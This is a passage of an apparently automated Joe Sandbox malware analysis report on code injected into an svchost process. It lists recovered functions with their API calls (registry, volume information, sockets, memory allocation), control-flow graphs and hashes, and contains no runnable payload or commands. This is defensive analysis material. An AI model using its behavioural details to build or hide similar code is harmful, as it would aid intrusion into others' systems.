                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLastmemset$CreateEventObjectRegisterSendSingleWait
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2712206520-0
                                                                                                                                                            • Opcode ID: ed1f69759fc9846d14fe70fe355f8a9b7a05a3a4322dc7bb6090fd7b5e4ba7a2
                                                                                                                                                            • Instruction ID: 3723f4b32e77ac7842a0d06eec2f543d7a12a91bab0bf6b93ff7a56409f3964b
                                                                                                                                                            • Opcode Fuzzy Hash: ed1f69759fc9846d14fe70fe355f8a9b7a05a3a4322dc7bb6090fd7b5e4ba7a2
                                                                                                                                                            • Instruction Fuzzy Hash: 495142B150070AAFDB24CF25C884A66BBF8FF05358B048A5EE956C7A51E734F855CF90
                                                                                                                                                            Function 04D747FD Relevance: 9.1, APIs: 6, Instructions: 104registryCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 04D74817
                                                                                                                                                              • Part of subcall function 04D7327F: GetModuleHandleA.KERNEL32(04D9615C,04D9616C), ref: 04D73291
                                                                                                                                                              • Part of subcall function 04D7327F: GetProcAddress.KERNEL32(00000000), ref: 04D73298
                                                                                                                                                            • RegOpenKeyExW.KERNELBASE(80000002,04D9635C,00000000,00000001,00000068), ref: 04D7483F
                                                                                                                                                            • RegQueryValueExW.KERNELBASE(00000068,04D96344,00000000,00000000,?,00000000), ref: 04D74865
                                                                                                                                                            • RegCloseKey.KERNELBASE(00000068), ref: 04D7488B
                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04D7489D
                                                                                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04D748C2
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressCloseCurrentDirectoryHandleInformationModuleOpenProcProcessQuerySystemValueVolume
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3913378182-0
                                                                                                                                                            • Opcode ID: 73d44226224712c3cd61af084414f29dc28d7fa2709cb7ef2f50da538b0138b9
                                                                                                                                                            • Instruction ID: 4c143e5ca73cbb66941b1b808e56032b0115e51b2707fee97723b60e5561c277
                                                                                                                                                            • Opcode Fuzzy Hash: 73d44226224712c3cd61af084414f29dc28d7fa2709cb7ef2f50da538b0138b9
                                                                                                                                                            • Instruction Fuzzy Hash: FA31B2B2A0111CBAEB11DAA1DC49FDF7BBCEF04354F000595B649E2140EA74AB84CBA0
                                                                                                                                                            Function 04D7AC1B Relevance: 7.6, APIs: 5, Instructions: 94networkCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 179 4d7ac1b-4d7ac3f ioctlsocket 180 4d7ac57-4d7ac71 CreateIoCompletionPort 179->180 181 4d7ac41 WSAGetLastError 179->181 183 4d7ac73-4d7ac77 180->183 184 4d7ac7c-4d7ac86 180->184 182 4d7ac47-4d7ac48 181->182 185 4d7ac4b-4d7ac52 call 4d7bd00 182->185 186 4d7acaf-4d7acb7 GetLastError 183->186 187 4d7ac79 183->187 188 4d7ac8e-4d7ac95 184->188 189 4d7ac88 184->189 197 4d7acfb-4d7acfe 185->197 186->185 187->184 191 4d7ac97-4d7ac9a 188->191 192 4d7accd-4d7acd1 188->192 189->188 191->192 196 4d7ac9c-4d7ac9e 191->196 194 4d7ace3-4d7ace7 192->194 195 4d7acd3-4d7ace1 call 4d7ad14 192->195 199 4d7ad00-4d7ad07 194->199 200 4d7ace9-4d7acf9 call 4d7ad4b 194->200 195->194 195->197 196->192 201 4d7aca0-4d7aca7 SetFileCompletionNotificationModes 196->201 202 4d7ad0f-4d7ad13 197->202 203 4d7ad0d 199->203 204 4d7ad09 199->204 200->197 200->199 207 4d7acb9-4d7acc4 201->207 208 4d7aca9-4d7acad 201->208 203->202 204->203 207->192 211 4d7acc6-4d7acc8 207->211 208->192 211->182
                                                                                                                                                            APIs
                                                                                                                                                            • ioctlsocket.WS2_32(04D7BDF5,8004667E,04D7BE72), ref: 04D7AC36
                                                                                                                                                            • WSAGetLastError.WS2_32(?,?,04D7ABE0,17E80870,04D7BDF5,00000000,00000010,00000000,?,?,?,04D7AB6C,04D7BDF5,00000002,04D7BDF5,00000010), ref: 04D7AC41
                                                                                                                                                            • CreateIoCompletionPort.KERNELBASE(04D7BDF5,19751710,04D7BDF5,00000000,?,?,04D7ABE0,17E80870,04D7BDF5,00000000,00000010,00000000,?,?,?,04D7AB6C), ref: 04D7AC61
                                                                                                                                                            • SetFileCompletionNotificationModes.KERNEL32(04D7BDF5,00000003,?,?,04D7ABE0,17E80870,04D7BDF5,00000000,00000010,00000000,?,?,?,04D7AB6C,04D7BDF5), ref: 04D7ACA3
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Completion$CreateErrorFileLastModesNotificationPortioctlsocket
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3397353003-0
                                                                                                                                                            • Opcode ID: 786008a994a19bc0f5f5f85d149398b00491e50218a4ead095afe990a9c4514b
                                                                                                                                                            • Instruction ID: 8174f6a700f0b0636d7d6b9fc40bab116fb0f01ce37a2ba5ccc636860e3384c8
                                                                                                                                                            • Opcode Fuzzy Hash: 786008a994a19bc0f5f5f85d149398b00491e50218a4ead095afe990a9c4514b
                                                                                                                                                            • Instruction Fuzzy Hash: 1231A075200605BBEB269E64DD85B6E7EA8FB80358F148519FA4292380FB75FE40C7A4
                                                                                                                                                            Function 04D7B1B1 Relevance: 4.6, APIs: 3, Instructions: 136COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 213 4d7b1b1-4d7b1c7 214 4d7b1d2-4d7b1d5 213->214 215 4d7b1c9-4d7b1cd 213->215 217 4d7b1d7-4d7b1e6 call 4d7bdce 214->217 218 4d7b1f6-4d7b203 214->218 216 4d7b2c6-4d7b2cc call 4d7bd00 215->216 226 4d7b2cd-4d7b2d0 216->226 223 4d7b1eb-4d7b1f0 217->223 220 4d7b205-4d7b212 call 4d7bf21 218->220 221 4d7b21e-4d7b254 memset 218->221 220->221 229 4d7b214-4d7b219 220->229 228 4d7b25d-4d7b25f 221->228 223->218 223->226 230 4d7b30f-4d7b313 226->230 231 4d7b261-4d7b269 228->231 232 4d7b2af-4d7b2ba GetLastError 228->232 235 4d7b2c3 229->235 233 4d7b2d2-4d7b2e0 231->233 236 4d7b26b-4d7b279 231->236 232->233 234 4d7b2bc-4d7b2c2 WSAGetLastError 232->234 237 4d7b2e2-4d7b2e7 233->237 238 4d7b2f8-4d7b30b 233->238 234->235 235->216 239 4d7b28e-4d7b2ad call 4d7c812 236->239 240 4d7b27b-4d7b27d 236->240 237->238 244 4d7b2e9-4d7b2f0 237->244 242 4d7b30d 238->242 239->242 240->239 241 4d7b27f-4d7b286 240->241 241->239 245 4d7b288-4d7b28b 241->245 242->230 244->238 247 4d7b2f2-4d7b2f5 244->247 245->239 247->238
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: eb1bcc4fa5b9598324643400270e0c67b5c181880b9fbdb80f86d1e7228ce30c
                                                                                                                                                            • Instruction ID: 64bdfef1ce9ae5d8a342981d595f377fe0ad0f3e5467555c96aef0c127b8ff03
                                                                                                                                                            • Opcode Fuzzy Hash: eb1bcc4fa5b9598324643400270e0c67b5c181880b9fbdb80f86d1e7228ce30c
                                                                                                                                                            • Instruction Fuzzy Hash: C541AEB1601201EFDB14CF15C881BAAB7B8FF05358F04856AEE459F256E734F801CBA0
                                                                                                                                                            Function 04D7BB4C Relevance: 4.6, APIs: 3, Instructions: 119COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 248 4d7bb4c-4d7bb62 249 4d7bb64-4d7bb69 248->249 250 4d7bb88-4d7bb8d 248->250 251 4d7bb77-4d7bb80 call 4d7bc89 249->251 252 4d7bb6b-4d7bb75 shutdown 249->252 253 4d7bbe0-4d7bbe6 250->253 254 4d7bb8f-4d7bb93 250->254 251->253 266 4d7bb82-4d7bb86 251->266 252->253 256 4d7bc0a-4d7bc10 253->256 257 4d7bbe8-4d7bbf1 253->257 254->253 258 4d7bb95-4d7bb9e call 4d7bc89 254->258 261 4d7bc34-4d7bc39 256->261 262 4d7bc12-4d7bc1b 256->262 257->256 260 4d7bbf3-4d7bbf5 257->260 258->253 271 4d7bba0-4d7bba8 258->271 260->256 267 4d7bbf7-4d7bbf9 260->267 264 4d7bc3b-4d7bc44 closesocket 261->264 265 4d7bc48-4d7bc54 261->265 262->261 268 4d7bc1d-4d7bc1f 262->268 264->265 272 4d7bc56-4d7bc58 265->272 273 4d7bc5a-4d7bc5d 265->273 266->253 267->256 274 4d7bbfb-4d7bc02 267->274 268->261 270 4d7bc21-4d7bc23 268->270 270->261 275 4d7bc25-4d7bc2c 270->275 271->253 276 4d7bbaa-4d7bbac 271->276 272->273 277 4d7bc60-4d7bc6e 272->277 273->277 274->256 278 4d7bc04-4d7bc07 274->278 275->261 279 4d7bc2e-4d7bc31 275->279 280 4d7bbae-4d7bbb9 276->280 281 4d7bc85-4d7bc88 277->281 282 4d7bc70-4d7bc75 277->282 278->256 279->261 283 4d7bbcf-4d7bbdc 280->283 284 4d7bbbb-4d7bbc2 280->284 282->281 285 4d7bc77-4d7bc82 282->285 283->280 287 4d7bbde-4d7bbdf 283->287 284->283 286 4d7bbc4-4d7bbcb closesocket 284->286 285->281 286->283 287->253
                                                                                                                                                            APIs
                                                                                                                                                            • shutdown.WS2_32(D7FF5604,00000001), ref: 04D7BB6F
                                                                                                                                                            • closesocket.WS2_32(?), ref: 04D7BBC5
                                                                                                                                                            • closesocket.WS2_32(D7FF5604), ref: 04D7BC3E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: closesocket$shutdown
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3079814495-0
                                                                                                                                                            • Opcode ID: 5b6121338fa46cadf5685f39715739bacf2f6ab8b671e2525d0391fed4985eaa
                                                                                                                                                            • Instruction ID: f47872c4d6f757f4717d39d611229a358bc8155d4797a612f47c6890746a154c
                                                                                                                                                            • Opcode Fuzzy Hash: 5b6121338fa46cadf5685f39715739bacf2f6ab8b671e2525d0391fed4985eaa
                                                                                                                                                            • Instruction Fuzzy Hash: B0414F71500B059FEB348E35D945762BBF0FF003A8F548A1FD8A696AA0EB34F946CB51
                                                                                                                                                            Function 04D7BA74 Relevance: 3.1, APIs: 2, Instructions: 86networkCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 288 4d7ba74-4d7ba80 289 4d7ba82-4d7ba87 288->289 290 4d7ba9c-4d7bab5 288->290 289->290 291 4d7ba89-4d7ba8b 289->291 292 4d7bab7-4d7bad0 setsockopt 290->292 293 4d7bb0b-4d7bb21 call 4d7c0bb call 4d7bd00 290->293 291->290 295 4d7ba8d-4d7ba94 291->295 296 4d7bad2-4d7baee call 4d7afbc 292->296 297 4d7baf0-4d7bb09 WSAGetLastError call 4d7bd00 292->297 308 4d7bb24-4d7bb2f 293->308 295->290 299 4d7ba96-4d7ba99 295->299 296->308 297->308 299->290 310 4d7bb47-4d7bb4b 308->310 311 4d7bb31-4d7bb33 308->311 311->310 312 4d7bb35-4d7bb37 311->312 312->310 313 4d7bb39-4d7bb44 312->313 313->310
                                                                                                                                                            APIs
                                                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00007010,00000000,00000000), ref: 04D7BAC8
                                                                                                                                                            • WSAGetLastError.WS2_32(?,04D79BAC,00000000,00000000,?,00000000,00000000,00000000,04D79A2D,00000000,?,00000000,04D73488,?,00000000,?), ref: 04D7BAF0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLastsetsockopt
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1729277954-0
                                                                                                                                                            • Opcode ID: fdea7ff6ef092656251672ab10d6f715f4f9b69a9b9a4fef09f7cfb529ac3f77
                                                                                                                                                            • Instruction ID: cfce6ea1d82afc449aaca5438d50634510f99af081ded7beb33c070f908518e2
                                                                                                                                                            • Opcode Fuzzy Hash: fdea7ff6ef092656251672ab10d6f715f4f9b69a9b9a4fef09f7cfb529ac3f77
                                                                                                                                                            • Instruction Fuzzy Hash: 70314D70600706AFDB209F25C884A66B7B8FF09768B008A1AFD5A97741E730F915DBA4
                                                                                                                                                            Function 003500A4 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 003500CD
                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00350279
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000003.2329135729.0000000000350000.00000040.00000001.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_3_350000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Virtual$AllocFree
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2087232378-0
                                                                                                                                                            • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                            • Instruction ID: 06b0fa751ca22934e03c08c142055275a50f2de155840e29e7cd948044b916b3
                                                                                                                                                            • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                            • Instruction Fuzzy Hash: 0B71CB71E0424ADFCB46CF98C981BEDBBF0AF08315F244495E865FB251C235AA84DF65
                                                                                                                                                            Function 04D7F4F8 Relevance: 2.6, APIs: 2, Instructions: 82stringCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 314 4d7f4f8-4d7f4ff 315 4d7f505-4d7f521 314->315 316 4d7f5d4-4d7f5d5 314->316 317 4d7f523-4d7f52e call 4d8237a 315->317 318 4d7f531-4d7f536 315->318 317->318 319 4d7f547-4d7f54c 318->319 320 4d7f538-4d7f544 call 4d8237a free 318->320 323 4d7f54e-4d7f55a call 4d7f42f 319->323 324 4d7f55b-4d7f55f 319->324 320->319 323->324 328 4d7f561-4d7f586 call 4d7f46f call 4d7f42f call 4d7f4cb 324->328 329 4d7f589-4d7f58e 324->329 328->329 331 4d7f590-4d7f59c call 4d7f4cb 329->331 332 4d7f59d-4d7f5a5 329->332 331->332 337 4d7f5a7-4d7f5c1 strlen call 4d8237a 332->337 338 4d7f5c4-4d7f5d3 call 4d8237a 332->338 337->338 338->316
                                                                                                                                                            APIs
                                                                                                                                                            • free.MSVCRT(000443E8,000443E8,0000402D,00000000,?,00000000,04D7505E,04D75127,04D7505E,00000000,04D750C1,?,00000000,04D7505E,00000000,04D75188), ref: 04D7F542
                                                                                                                                                            • strlen.MSVCRT ref: 04D7F5A8
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: freestrlen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 322734593-0
                                                                                                                                                            • Opcode ID: f17bf73664d0007fe241282c84fb602e5d5728dfa2ff23b29a4b25d5cee35c9f
                                                                                                                                                            • Instruction ID: 93f1e93511fa6591c7e317f92e6796548b82266eabc1da5e155edf71a60a7f49
                                                                                                                                                            • Opcode Fuzzy Hash: f17bf73664d0007fe241282c84fb602e5d5728dfa2ff23b29a4b25d5cee35c9f
                                                                                                                                                            • Instruction Fuzzy Hash: 3A215E31304704AFEE31BB39EC44F5BB7E9FF44318B05482DF586A2560EB22F9108A65
                                                                                                                                                            Function 04D75514 Relevance: 2.6, APIs: 2, Instructions: 66COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • malloc.MSVCRT ref: 04D7551F
                                                                                                                                                            • memset.MSVCRT ref: 04D75534
                                                                                                                                                              • Part of subcall function 04D7ED4F: memset.MSVCRT ref: 04D7ED5A
                                                                                                                                                              • Part of subcall function 04D7ED63: calloc.MSVCRT(00000001,0000402D,0000017C,?,?,?,04D75573,?,04D97BE8,?,?,?,00000000,00000000,0000017C), ref: 04D7ED86
                                                                                                                                                              • Part of subcall function 04D7F06E: strlen.MSVCRT ref: 04D7F07C
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: memset$callocmallocstrlen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 285299393-0
                                                                                                                                                            • Opcode ID: 7ea7cea8f610c74ca4bddd013c584ffad92f975e2a90fcfadc462f1b1c18e688
                                                                                                                                                            • Instruction ID: a5b1bdfeb926ac1ac328a56e8f252712656246a7f9092dfc6e239f7c881be4ee
                                                                                                                                                            • Opcode Fuzzy Hash: 7ea7cea8f610c74ca4bddd013c584ffad92f975e2a90fcfadc462f1b1c18e688
                                                                                                                                                            • Instruction Fuzzy Hash: 7811E276700301BBEB20AFA4DC46F4BBBA9EF40B44F004819F51997600E771F810CBA1
                                                                                                                                                            Function 04D74F50 Relevance: 2.5, APIs: 2, Instructions: 23COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 375 4d74f50-4d74f63 malloc call 4d7a8fd 377 4d74f68-4d74f6d 375->377 378 4d74f6f-4d74f7a free 377->378 379 4d74f7b-4d74f8a call 4d74f8b 377->379
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: freemalloc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3061335427-0
                                                                                                                                                            • Opcode ID: cbff4eb4fad1dea9a878228d27a44015dbb3ff88c7d3b1f2a17269a60f8bb5f4
                                                                                                                                                            • Instruction ID: 0f60851459249c47edda4171296e9b3beb26020cd93aafb1996927d24eb29b67
                                                                                                                                                            • Opcode Fuzzy Hash: cbff4eb4fad1dea9a878228d27a44015dbb3ff88c7d3b1f2a17269a60f8bb5f4
                                                                                                                                                            • Instruction Fuzzy Hash: 13D05B3320D221BFEA6627747C199DB7B9AEF45365F008896F904C0280FF196D46C6B6
                                                                                                                                                            Function 04D7AFE4 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 382 4d7afe4-4d7b00f 383 4d7b024-4d7b02c 382->383 384 4d7b011-4d7b014 382->384 386 4d7b050-4d7b054 383->386 387 4d7b02e-4d7b033 383->387 384->383 385 4d7b016-4d7b01f 384->385 385->383 388 4d7b021 385->388 389 4d7b047-4d7b049 call 4d7b055 387->389 390 4d7b035-4d7b038 387->390 388->383 393 4d7b04e-4d7b04f 389->393 390->389 391 4d7b03a-4d7b044 CreateEventA 390->391 391->389 393->386
                                                                                                                                                            APIs
                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,04D728A5,?,04D7A87B,?,04D728A5,04D728A5,04D753A0,?,04D753D5,04D75421,04D75376,?), ref: 04D7B03E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateEvent
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2692171526-0
                                                                                                                                                            • Opcode ID: 329a9a1e49f68f776df75edc5ce721c68d0175dd2dbf4e595eea9a294fda7b1e
                                                                                                                                                            • Instruction ID: ad8834e19c8f17d2c1620cb549df897a4b29479a2b52d482b4343648bebed679
                                                                                                                                                            • Opcode Fuzzy Hash: 329a9a1e49f68f776df75edc5ce721c68d0175dd2dbf4e595eea9a294fda7b1e
                                                                                                                                                            • Instruction Fuzzy Hash: 14014870604701AFE730CF25D444AA7B7F9FF8A328F04891EE99686A40E334F845CB50
                                                                                                                                                            Function 04D7ED63 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 394 4d7ed63-4d7ed8f calloc 395 4d7eda6-4d7edad 394->395 396 4d7ed91-4d7eda4 394->396 397 4d7edc4-4d7ee14 395->397 396->395 400 4d7edaf-4d7edc2 call 4d7ef90 call 4d7ee1d 396->400 405 4d7ee18-4d7ee1c 397->405 400->397 407 4d7ee16 400->407 407->405
                                                                                                                                                            APIs
                                                                                                                                                            • calloc.MSVCRT(00000001,0000402D,0000017C,?,?,?,04D75573,?,04D97BE8,?,?,?,00000000,00000000,0000017C), ref: 04D7ED86
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: calloc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2635317215-0
                                                                                                                                                            • Opcode ID: f68a472fbb2cc6db9bc464fb84ae0825e2e8b9493b05e9bed87347c9b8ef996b
                                                                                                                                                            • Instruction ID: 11c28ccbd12aa16ff9c7dac5d3d3bb43920fa91fc5f1f134f74777503e0bbe52
                                                                                                                                                            • Opcode Fuzzy Hash: f68a472fbb2cc6db9bc464fb84ae0825e2e8b9493b05e9bed87347c9b8ef996b
                                                                                                                                                            • Instruction Fuzzy Hash: 2021CCB1A057019FD7209F2AD840A86FBE8FF94754F20885FE699D7690DBB0B4409B54
                                                                                                                                                            Function 04D722BC Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: malloc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2803490479-0
                                                                                                                                                            • Opcode ID: e6d4da21ca705ed476b301030b350d846e18c866a1ca47d9cf13a7cf002dcbd1
                                                                                                                                                            • Instruction ID: 3668498bd69a3e70e7fb5ee0c44eae24728f93ed2300da9146fbbc20040ee7c6
                                                                                                                                                            • Opcode Fuzzy Hash: e6d4da21ca705ed476b301030b350d846e18c866a1ca47d9cf13a7cf002dcbd1
                                                                                                                                                            • Instruction Fuzzy Hash: C9F01CB5A04209AFDF09CF94D854DA93BA6FF48314B0544ADFE0D8B360DB31E820DB65

                                                                                                                                                            Non-executed Functions

                                                                                                                                                            Function 00350283 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000003.2329135729.0000000000350000.00000040.00000001.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_3_350000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                            • Instruction ID: d83e3ce86b4da7100ddcece694826ec06cd42fd1fd02e3440ffa3a3d173eac0d
                                                                                                                                                            • Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                            • Instruction Fuzzy Hash: FCF04979A012009F8B2ACF09C548C95B7B6FB95722F6648A5D804EB271D3B2ED49CB60
                                                                                                                                                            Function 04D75920 Relevance: 31.6, APIs: 25, Instructions: 300COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • memcmp.MSVCRT(?,04D96FBC,00000001,00000000,?,04D73ABF,?,?), ref: 04D7594F
                                                                                                                                                            • memcmp.MSVCRT(?,04D96FB8,00000002), ref: 04D7597E
                                                                                                                                                            • memcmp.MSVCRT(?,04D96FB4,00000003), ref: 04D759BE
                                                                                                                                                            • memcmp.MSVCRT(?,04D96FA0,00000004), ref: 04D75A53
                                                                                                                                                            • memcmp.MSVCRT(?,04D96F98,00000005), ref: 04D75A97
                                                                                                                                                            • memcmp.MSVCRT(?,04D96F70,00000006), ref: 04D75B55
                                                                                                                                                            • memcmp.MSVCRT(?,04D96F58,00000007), ref: 04D75BD1
                                                                                                                                                            • memcmp.MSVCRT(?,04D96F3C,00000008), ref: 04D75C4F
                                                                                                                                                            • memcmp.MSVCRT(?,04D96F18,00000009), ref: 04D75CCB
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: memcmp
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1475443563-0
                                                                                                                                                            • Opcode ID: f2a2afe4c5ee4594ed7aabf2f5b4c99ec580b9675844b0d0e2530cc8b3ea1bdc
                                                                                                                                                            • Instruction ID: b2309bfd7cf0970e85b63dad332aad6e0fe4edcc381924a73cb25d398c2a9486
                                                                                                                                                            • Opcode Fuzzy Hash: f2a2afe4c5ee4594ed7aabf2f5b4c99ec580b9675844b0d0e2530cc8b3ea1bdc
                                                                                                                                                            • Instruction Fuzzy Hash: FD815392744B0166FF242E245D07F2E26D6AB206ACFCC4161FD85E938AF552FE0EC752
                                                                                                                                                            Function 04D7ADBB Relevance: 16.7, APIs: 11, Instructions: 168networkregistryCOMMON
